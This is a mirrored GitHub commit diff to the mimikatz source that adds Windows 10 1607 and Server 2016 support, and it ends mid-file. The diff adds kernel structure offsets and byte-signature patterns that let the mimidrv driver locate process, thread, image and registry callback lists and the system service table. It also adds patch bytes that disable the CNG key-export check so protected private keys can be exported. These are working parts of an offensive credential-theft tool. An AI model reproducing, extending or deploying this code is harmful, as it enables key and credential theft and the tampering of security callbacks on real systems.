mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-02-07 04:41:32 +00:00
[new] mimikatz, mimilib & mimidrv Windows Server 2016 support
[fix] mimidrv kkll_m_process_fullprivileges buffer size check
This commit is contained in:
Benjamin DELPY
parent
57f4101567
commit
cdd0722efa
@ -36,8 +36,9 @@ typedef enum _KIWI_OS_INDEX {
|
||||
KiwiOsIndex_BLUE = 6,
|
||||
KiwiOsIndex_10_1507 = 7,
|
||||
KiwiOsIndex_10_1511 = 8,
|
||||
KiwiOsIndex_10_1607 = 9,
|
||||
|
||||
KiwiOsIndex_MAX = 9,
|
||||
KiwiOsIndex_MAX = 10,
|
||||
} KIWI_OS_INDEX, *PKIWI_OS_INDEX;
|
||||
|
||||
#ifdef _M_IX86
|
||||
|
||||
@ -16,8 +16,9 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 8 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* BLUE */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 10_1507*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1507*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -28,6 +29,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* BLUE */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 10_1507*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1511*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
#endif
|
||||
};
|
||||
|
||||
|
||||
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kkll_m_memory.h"
|
||||
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur)
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur)
|
||||
{
|
||||
for(*addressePattern = adresseBase; (adresseMaxMin > adresseBase) ? (*addressePattern <= adresseMaxMin) : (*addressePattern >= adresseMaxMin); *addressePattern += (adresseMaxMin > adresseBase) ? 1 : -1)
|
||||
if(RtlEqualMemory(pattern, *addressePattern, longueur))
|
||||
@ -14,7 +14,7 @@ NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxM
|
||||
return STATUS_NOT_FOUND;
|
||||
}
|
||||
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo)
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo)
|
||||
{
|
||||
NTSTATUS status = kkll_m_memory_search(adresseBase, adresseMaxMin, pattern, addressePointeur, longueur);
|
||||
if(NT_SUCCESS(status))
|
||||
|
||||
@ -32,8 +32,8 @@ typedef struct _KKLL_M_MEMORY_GENERIC {
|
||||
KKLL_M_MEMORY_OFFSETS Offsets;
|
||||
} KKLL_M_MEMORY_GENERIC, *PKKLL_M_MEMORY_GENERIC;
|
||||
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur);
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo);
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur);
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo);
|
||||
|
||||
PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics);
|
||||
NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size);
|
||||
|
||||
@ -29,6 +29,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"ObCreateObject", L"NtFindAtom", { -5, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
@ -37,6 +38,7 @@ UCHAR PTRN_WI8_Process[] = {0x8b, 0xc3, 0x48, 0x8d, 0x34, 0xc1, 0x48, 0x8b, 0xce
|
||||
UCHAR PTRN_W81_Process[] = {0x48, 0x8d, 0x04, 0xc1, 0x48, 0x89, 0x45, 0x70, 0x48, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
@ -45,6 +47,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"ObCreateObject", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
||||
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
||||
@ -60,6 +63,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"SeRegisterLogonSessionTerminatedRoutineEx", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
||||
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
||||
@ -75,6 +79,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 25, 0x010, 0x070, 0x0c8}},
|
||||
};
|
||||
UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
@ -90,6 +95,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
|
||||
@ -108,6 +114,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = { // PspCreateThreadNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
|
||||
UCHAR PTRN_W23_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
|
||||
@ -116,7 +123,7 @@ UCHAR PTRN_WI7_Process[] = {0x83, 0x65, 0x30, 0x00, 0xff, 0x75, 0x20, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x83, 0xc0, 0x40, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x45, 0x9c, 0xbe};
|
||||
UCHAR PTRN_W81_Process[] = {0x89, 0x45, 0x9c, 0x83, 0x65, 0x8c, 0x00, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xf7, 0x57, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
@ -126,6 +133,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"PoRequestShutdownEvent", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
UCHAR PTRN_W23_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
@ -144,6 +152,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = { // PspLoadImageNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Image), PTRN_W10_1507_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
|
||||
UCHAR PTRN_W23_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
|
||||
@ -161,6 +170,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Reg[] = {0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
|
||||
UCHAR PTRN_W23_Reg[] = {0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
|
||||
@ -178,6 +188,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
};
|
||||
#endif
|
||||
|
||||
|
||||
@ -17,6 +17,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* BLUE */ {0x00b8, 0x00c0, 0x0040, 0x02cc},
|
||||
/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -27,6 +28,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* BLUE */ {0x02e8, 0x02f8, 0x0040, 0x0678},
|
||||
/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
|
||||
/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
|
||||
/* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0},
|
||||
#endif
|
||||
};
|
||||
|
||||
@ -231,7 +233,7 @@ NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_
|
||||
|
||||
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
|
||||
{
|
||||
if(pPid && (szBufferIn == sizeof(PULONG)))
|
||||
if(pPid && (szBufferIn == sizeof(ULONG)))
|
||||
status = PsLookupProcessByProcessId((HANDLE) *pPid, &pProcess);
|
||||
else
|
||||
pProcess = PsGetCurrentProcess();
|
||||
|
||||
@ -43,17 +43,17 @@ NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer)
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
|
||||
const LONG OFFS_WNO8_Ke = -24;//-19;
|
||||
const LONG OFFS_WIN8_Ke = -21;//-16;
|
||||
const LONG OFFS_WIN10A_Ke = -38;//-16;
|
||||
NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable()
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
UCHAR PTRN_WALL_Ke[] = {0x00, 0x00, 0x4d, 0x0f, 0x45, 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
|
||||
LONG OFFS_WNO8_Ke = -19;
|
||||
LONG OFFS_WIN8_Ke = -16;
|
||||
|
||||
if(KeServiceDescriptorTable)
|
||||
status = STATUS_SUCCESS;
|
||||
else
|
||||
status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : OFFS_WIN8_Ke);
|
||||
status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke);
|
||||
return status;
|
||||
}
|
||||
#endif
|
||||
@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
|
||||
KIWI_OS_INDEX getWindowsIndex()
|
||||
{
|
||||
if(*NtBuildNumber > 10586) // forever 10 =)
|
||||
return KiwiOsIndex_10_1511;
|
||||
if(*NtBuildNumber > 14393) // forever 10 =)
|
||||
return KiwiOsIndex_10_1607;
|
||||
|
||||
switch(*NtBuildNumber)
|
||||
{
|
||||
@ -201,6 +201,9 @@ KIWI_OS_INDEX getWindowsIndex()
|
||||
case 10586:
|
||||
return KiwiOsIndex_10_1511;
|
||||
break;
|
||||
case 14393:
|
||||
return KiwiOsIndex_10_1607;
|
||||
break;
|
||||
default:
|
||||
return KiwiOsIndex_UNK;
|
||||
}
|
||||
|
||||
@ -1232,27 +1232,32 @@ NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
}
|
||||
|
||||
BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb};
|
||||
BYTE PATC_W10_1607_SPCryptExportKey_EXPORT[]= {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
#ifdef _M_X64
|
||||
BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85};
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75};
|
||||
BYTE PTRN_WI80_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WI81_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84};
|
||||
BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75};
|
||||
BYTE PTRN_WI80_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WI81_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x0f, 0x84};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
|
||||
|
||||
@ -19,6 +19,7 @@ BYTE PTRN_WNT5_PerformWriteRequest[] = {0x49, 0x89, 0x5b, 0x10, 0x49, 0x89, 0x
|
||||
BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0x48, 0x8b, 0xda, 0xe8};
|
||||
